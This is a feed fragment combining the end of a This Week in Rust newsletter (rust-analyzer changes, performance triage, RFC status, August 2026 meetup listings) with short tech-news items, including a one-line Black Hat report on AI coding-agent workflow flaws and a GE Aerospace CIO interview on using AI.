<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22996">detect the rust-analyzer component in a multi-line components array</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22965">do not alloc anon consts for bare paths in blocks</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22992">don't panic on a self-referential <code>impl Trait</code> function</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22956">double stack size for threads to 16MiB</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23015">exclude unknown types from term search</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22933">fix lookup <code>MACRO_CALL@...</code> in this Semantics due to include!</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23008">fix <code>ExprScopes</code> handling of exprs inside patterns</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22886">fix glob import shadowing bug</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22948">make mir debug execution work fot bitflags items</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22943">mark auto traits as coinductive</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22957">no hint with similar name raw-ident arg</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23004">parse postfix range inside closure in access</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22993">recognize format arguments after a backslash in raw strings</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23016">resolve assignment lhs in its expression scope</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22964">show qualified paths when type names collide in E0308</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22947">hir-ty, ide-diagnostics: use E0057/E0061 for arg-count mismatch (was E0107)</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22966">perf: avoid having a separate query for defined opaques</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/23001">perf: save an allocation in lifetime handling</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22937">report a config error for postfix snippets with item scope</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22940"><code>vfs</code>: use component-based path prefix matching for virtual paths</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>A lot of optimizations landed this week. Some big improvements to rustdoc in <a href="https://github.com/rust-lang/rust/pull/159854">#159854</a>, one big improvement in control flow graph traversal for <code>cranelift-codegen</code>, few more improvements to next-solver benchmarks and various other micro-optimizations, bringing the total to a nice round number of 10 improvements this week.</p>
<p>Triage done by <strong>@panstromek</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=ad0c9dce27a22416b65946bc0010edaf22ac6c83&amp;end=65dd30fb9e882a7e8f0be10caca62936db2a98b8&amp;absolute=false&amp;stat=instructions%3Au">ad0c9dce..65dd30fb</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.3%</td>
<td>[0.2%, 0.5%]</td>
<td>18</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>2.1%</td>
<td>[0.1%, 16.8%]</td>
<td>64</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-3.3%</td>
<td>[-39.8%, -0.2%]</td>
<td>97</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-6.1%</td>
<td>[-39.6%, -0.1%]</td>
<td>111</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-2.7%</td>
<td>[-39.8%, 0.5%]</td>
<td>115</td>
</tr>
</tbody>
</table>
<p>1 Regression, 5 Improvements, 11 Mixed; 6 of them in rollups
32 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/c41ca2a96f74761503b333d9f416eb7012eef858/triage/2026/2026-08-03.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/issues/117693">Tracking Issue for <code>core_io_borrowed_buf</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/154645">Tracking Issue for <code>derive_macro_global_path</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159746">stabilize <code>c_variadic_naked_functions</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1021">Implement a naming convention for lint/diagnostic-only <code>rustc_</code> attrs</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1018">Encode OpenBSD <code>-current</code> version in targets' <code>target_env</code></a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1001">Promote <code>wasm32-wasip3</code> to Tier 2</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>,<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em>
Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><em>No New or Updated RFCs were created this week.</em></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-08-05 - 2026-09-02 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-08-05 | Virtual (Cardiff, UK) | <a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff">Rust and C++ Cardiff</a><ul>
<li><a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/315880365/"><strong>Operating Systems Book Club: Execution and Scheduling</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-08-07 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-10 | Hybrid (Kuala Lumpur, Malaysia) | <a href="https://discord.gg/Uz88bnZA3B">Rust Malaysia Meetup</a><ul>
<li><a href="https://docs.google.com/forms/d/e/1FAIpQLSfwGMGqDit9jn9INA1EROWTbvnjTAZAO1oUQaEwqmao7AYy1A/viewform"><strong>Rust Meetup August 2026</strong></a></li>
</ul>
</li>
<li>2026-08-11 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254776/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/313345333/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/315619609/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-08-14 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315604176/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
<li>2026-08-20 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520814/"><strong>August, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-20 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/315733791/"><strong>Tock OS Part #5 — Wireless Communication with the IEEE 802.15.4 protocol</strong></a></li>
</ul>
</li>
<li>2026-08-21 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/1bm27cah"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-25 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254775/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-27 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/313345334/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-21 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/arkkrcj5"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-09-02 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/wqzhftyjcmbdb/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa</a></h5>
<ul>
<li>2026-08-11 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup">Johannesburg Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315750593/"><strong>Rust's extended standard library</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-08-10 | Hybrid (Kuala Lumpur, MY) | <a href="https://discord.gg/Uz88bnZA3B">Rust Malaysia Meetup</a><ul>
<li><a href="https://docs.google.com/forms/d/e/1FAIpQLSfwGMGqDit9jn9INA1EROWTbvnjTAZAO1oUQaEwqmao7AYy1A/viewform"><strong>Rust Meetup August 2026</strong></a></li>
</ul>
</li>
<li>2026-08-22 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/august-2026-rustacean-meetup/"><strong>August 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-22 | Delhi, IN | <a href="https://www.meetup.com/rustdelhi">Rust Delhi</a><ul>
<li><a href="https://www.meetup.com/rustdelhi/events/315185336/"><strong>Rust Delhi X SciPy India Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-22 | Noida, IN | <a href="https://scipy.in/">SciPy India</a><ul>
<li><a href="https://scipy.in/sci-py-rs/"><strong>Scientific Computing in Rust and Python</strong></a></li>
</ul>
</li>
<li>2026-08-29 | Pune, IN | <a href="https://hasgeek.com/rustpune/">Rust Pune</a><ul>
<li><a href="https://hasgeek.com/rustpune/meetup-august-2026/"><strong>Rust Pune Meetup: August 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-08-05 | Köln, DE | <a href="https://www.meetup.com/rust-cologne-bonn/events/">Rust Cologne</a><ul>
<li><a href="https://www.meetup.com/rustcologne/events/315910506/"><strong>Rust in August: Don't panic! …or_else?</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315966137/"><strong>Rust Berlin on location 🏳️‍🌈 - Edition 016</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Oxford, UK | <a href="https://www.meetup.com/oxford-rust-meetup-group">Oxford ACCU/Rust Meetup.</a><ul>
<li><a href="https://www.meetup.com/oxford-rust-meetup-group/events/315863373/"><strong>ACCU/Rust Summer social</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Aarhus, DK | <a href="https://www.meetup.com/rust-aarhus">Rust Aarhus</a><ul>
<li><a href="https://www.meetup.com/rust-aarhus/events/315683629/"><strong>Hack Night: Trust but verify the LLM</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816474/"><strong>Topic TBD</strong></a></li>
</ul>
</li>
<li>2026-08-20 | Frankfurt, DE | <a href="https://www.meetup.com/rust-rhein-main">Rust Rhein-Main</a><ul>
<li><a href="https://www.meetup.com/rust-rhein-main/events/315855368/"><strong>Building an acoustic camera with egui and embassy</strong></a></li>
</ul>
</li>
<li>2026-08-27 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315891530/"><strong>Rust Manchester August Talks</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-08-06 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/315590399/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/314701905/"><strong>Shipping Temporal: How a Global Rust Ecosystem Built Chrome’s Newest Web API</strong></a></li>
</ul>
</li>
<li>2026-08-11 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc/events/">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315963710/"><strong>Rust NYC: 'An intro to wgpu' and 'Let's Talk Generics!'</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696652/"><strong>Utah Rust August Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-13 | San Diego, CA, US | <a href="https://www.meetup.com/san-diego-rust">San Diego Rust</a><ul>
<li><a href="https://www.meetup.com/san-diego-rust/events/315601099/"><strong>San Diego Rust August Meetup - Back in person!</strong></a></li>
</ul>
</li>
<li>2026-08-15 | San Francisco, CA, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/juWAwRs3XMWP7s9wLNWK"><strong>BOG-A-THON 3</strong></a></li>
</ul>
</li>
<li>2026-08-18 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997215/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
<li>2026-08-19 | San Francisco, CA, US | <a href="https://luma.com/bayarearust">Bay Area Rust</a><ul>
<li><a href="https://luma.com/00f2s7q9"><strong>Bay Area Rust August Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-20 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520814/"><strong>August, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-26 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/315171660/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-08-26 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles/events/">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315963062/"><strong>Rust LA August! Rust in Quantum Computing</strong></a></li>
</ul>
</li>
<li>2026-08-27 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539331/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-08-27 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039490/"><strong>Rust Melbourne August 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-08-08 | São Paulo, SP | <a href="https://luma.com/calendar/cal-bif2oHITU1aVvsr">Rust-SP</a><ul>
<li><a href="https://luma.com/41oiyhtk"><strong>Rust SP - Aug/2026</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>… but I gave up on the idea as the macro rules were turning into a turing complete rust syntax parser</p>
</blockquote>
<p>– <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1637">Koosha on rust-users</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1787">miro</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1vgv7sn/this_week_in_rust_663">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat USA 2026: One GitHub Issue Could Compromise Major AI Coding Workflows]]></title>
<description><![CDATA[At Black Hat USA 2026, Novee found GitHub workflow flaws in Claude Code, Gemini CLI and Codex that enabled RCE, credential theft and agent control in pipelines.]]></description>
<link>https://tsecurity.de/de/3707737/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707737/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 13:01:40 +0200</pubDate>
<content:encoded><![CDATA[At Black Hat USA 2026, Novee found GitHub workflow flaws in Claude Code, Gemini CLI and Codex that enabled RCE, credential theft and agent control in pipelines.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Previews First AI Coding Agent]]></title>
<description><![CDATA[Meta launches test version of Muse Code and Muse Spark 1.2, as it looks to compete with Anthropic and OpenAI
Read more →
The post Meta Previews First AI Coding Agent appeared first on IT Security News.]]></description>
<link>https://tsecurity.de/de/3707717/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707717/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 12:57:16 +0200</pubDate>
<content:encoded><![CDATA[<p>Meta launches test version of Muse Code and Muse Spark 1.2, as it looks to compete with Anthropic and OpenAI</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/meta-previews-first-ai-coding-agent/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/meta-previews-first-ai-coding-agent/">Meta Previews First AI Coding Agent</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Browser security is where software, data, and AI meet]]></title>
<description><![CDATA[In this interview with Help Net Security, Rui Ribeiro, CEO of Jscrambler, explains why the browser has become a security problem organizations do not control. Companies do not own the device, the extensions, or the network path, yet that is where application logic, third-party code, customer data...]]></description>
<link>https://tsecurity.de/de/3707692/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707692/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 12:51:54 +0200</pubDate>
<content:encoded><![CDATA[<p>In this interview with Help Net Security, Rui Ribeiro, CEO of Jscrambler, explains why the browser has become a security problem organizations do not control. Companies do not own the device, the extensions, or the network path, yet that is where application logic, third-party code, customer data, and AI meet during every customer interaction. He discusses the limits of Content Security Policy and Subresource Integrity, the risks of third-party AI chat scripts running with the … <a href="https://www.helpnetsecurity.com/2026/08/06/rui-ribeiro-jscrambler-browser-security/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/08/06/rui-ribeiro-jscrambler-browser-security/">Browser security is where software, data, and AI meet</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI takes flight at GE Aerospace]]></title>
<description><![CDATA[The race to adopt AI has left many CIOs wrestling with a fundamental question: How do you move faster without introducing unacceptable risk?



Few leaders face that challenge at a higher level than David Burns, CIO of GE Aerospace. Building on the company’s decade of experience applying AI acros...]]></description>
<link>https://tsecurity.de/de/3707684/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707684/nachrichtenportal/</guid>
<pubDate>Thu, 06 Aug 2026 12:51:46 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The race to adopt AI has left many CIOs wrestling with a fundamental question: How do you move faster without introducing unacceptable risk?</p>



<p class="wp-block-paragraph">Few leaders face that challenge at a higher level than David Burns, CIO of GE Aerospace. Building on the company’s decade of experience applying AI across its business, Burns is helping lead the next phase of the company’s digital transformation by leveraging AI to simplify and automate processes. Burns’ experience shows how AI can accelerate innovation, improve decision-making, and create value for the business and customers while maintaining the trust, safety, and operational rigor expected in the aerospace industry.</p>



<p class="wp-block-paragraph">In a recent episode of <a href="https://linktr.ee/techwhisperers">the Tech Whisperers podcast</a>, Burns opened up his playbook for leading organizations through turbulence. In this conversation, edited for length and clarity, he shares more practical lessons for technology leaders who are seeking to move beyond experimentation and scale AI responsibly across the enterprise.</p>



<p class="wp-block-paragraph"><strong>Dan Roberts: You’ve described AI as an accelerator. What exactly is AI accelerating inside GE Aerospace?</strong></p>



<p class="wp-block-paragraph"><strong>David Burns:</strong> At GE Aerospace, AI is used across our operations as an accelerator to Flight Deck, our proprietary lean operating model, and is applied to all key aspects of the business — design, manufacture, sales, and services. We identify and solve problems with Flight Deck and use AI to accelerate our problem-solving in ways we can genuinely feel, enabling us to identify issues earlier, solve problems faster for our customers, and improve how work gets done.</p>



<p class="wp-block-paragraph">For example, we are also using AI in:</p>



<p class="wp-block-paragraph"><strong>Design:</strong> While traditional processes for developing engine design concepts take months of manual work, the GE Aerospace Research Center built a proprietary generative AI application capable of producing hundreds of design concepts. As a result, the team produced the hypersonic ramjet engine design concept that met all regulatory requirements more than 90% faster than before, highlighting how AI is possible in engine design to support engineers bringing new technologies to market faster.</p>



<p class="wp-block-paragraph"><strong>Manufacture:</strong> Our team in Indianapolis used an AI coding assistant to automate a part quality inspection workflow, reducing 8 hours of manual measurement data entry for complex parts to just 3 seconds while improving data accuracy and inspection consistency. This has improved both the quality and efficiency for clearing parts to build, which helps drive on-time engine deliveries.</p>



<p class="wp-block-paragraph"><strong>Sales:</strong> Based on customer feedback that GE Aerospace’s responses for proposals needed to be faster, the sales team utilized a generative AI tool to synthesize data and produce deal proposals. The tool improved customer response time by more than two weeks for the GEnx team through reduced proposal development cycle time and standardized creation of more comprehensive deal proposals.</p>



<p class="wp-block-paragraph"><strong>Service:</strong> When LEAP engine rebuilds faced potential turnaround time (TAT) challenges due to material availability at our Maintenance, Repair and Overhaul (MRO) sites, our team in Lafayette, Indiana, applied AI to help reduce delays for customers. Using Daily &amp; Visual Management, they surfaced material flow challenges and their underlying drivers, leading to a new AI solution that leverages data to predict when and where parts are needed faster to reduce delays for our customers with an approximately six-day turnaround time improvement, 16% increase in on-time material orders, and 15% increase in on-time material delivery.</p>



<p class="wp-block-paragraph">Ultimately, by leveraging AI, Flight Deck helps us eliminate waste and identify and accelerate the most value-added steps for our customers, be it designing a part faster or responding to a customer request faster. And I would underscore that it’s value through the eyes of our customer. How we define value is not what we internally say; it’s how our customers define value, and how we’re working to be more customer-driven.</p>



<p class="wp-block-paragraph"><strong>GE Aerospace has been investing in analytics, machine learning, and digital capabilities for more than a decade. What advantages does that foundation create as you move into the generative AI era?</strong></p>



<p class="wp-block-paragraph">We’ve built one of the largest AI patent portfolios in the aviation industry through years of investment and supercomputing through digital technologies, and we continue to do work on our core transactional systems and our data foundations, so that way our data is AI-ready. This has allowed us to build our own AI capabilities and strong talent base. For example, the generative AI app we built to create new propulsion systems design was built in house by GE Aerospace scientists at the <a href="https://www.geaerospace.com/news/press-releases/ge-aerospace-completes-design-studies-hypersonic-ramjet-generative-ai">GE Aerospace Research Center</a>.</p>



